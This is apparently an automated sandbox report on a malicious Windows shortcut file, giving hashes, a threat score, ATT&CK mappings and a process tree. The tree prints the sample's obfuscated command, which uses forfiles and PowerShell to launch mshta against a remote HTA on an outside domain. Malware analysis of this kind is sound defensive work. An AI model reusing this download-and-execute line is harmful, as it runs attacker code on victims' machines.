61085e8dfb80e7de7fba6b83066253f6479fb81b4bbc0b4c4b18477c035bf92c

Analysis

max time kernel
118s
max time network
124s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
12/02/2024, 02:43

Target

61085e8dfb80e7de7fba6b83066253f6479fb81b4bbc0b4c4b18477c035bf92c.lnk
Size

2KB
MD5

572b88eb24399ecb796a86dfe7f9fc59
SHA1

65db9c2f7228b938744d25035de0db78af615c14
SHA256

61085e8dfb80e7de7fba6b83066253f6479fb81b4bbc0b4c4b18477c035bf92c
SHA512

0381061daff51e7ff875248838710ee3744849ddf4a3557f8ed71aee6ad524ebaacb4bc388c2feb3bd2d1ec257fefbb6a52e8bb9cac68c6b808936979df4bf9e

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2180 wrote to memory of 2880	2180	cmd.exe	29
PID 2180 wrote to memory of 2880	2180	cmd.exe	29
PID 2180 wrote to memory of 2880	2180	cmd.exe	29

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\61085e8dfb80e7de7fba6b83066253f6479fb81b4bbc0b4c4b18477c035bf92c.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2180
- C:\Windows\System32\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p \Windows\SKB /c "powershell . \*i*\S*3*\m*ta.e* https://mw-solaris.com/solaris.hta
  2⤵
  PID:2880

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact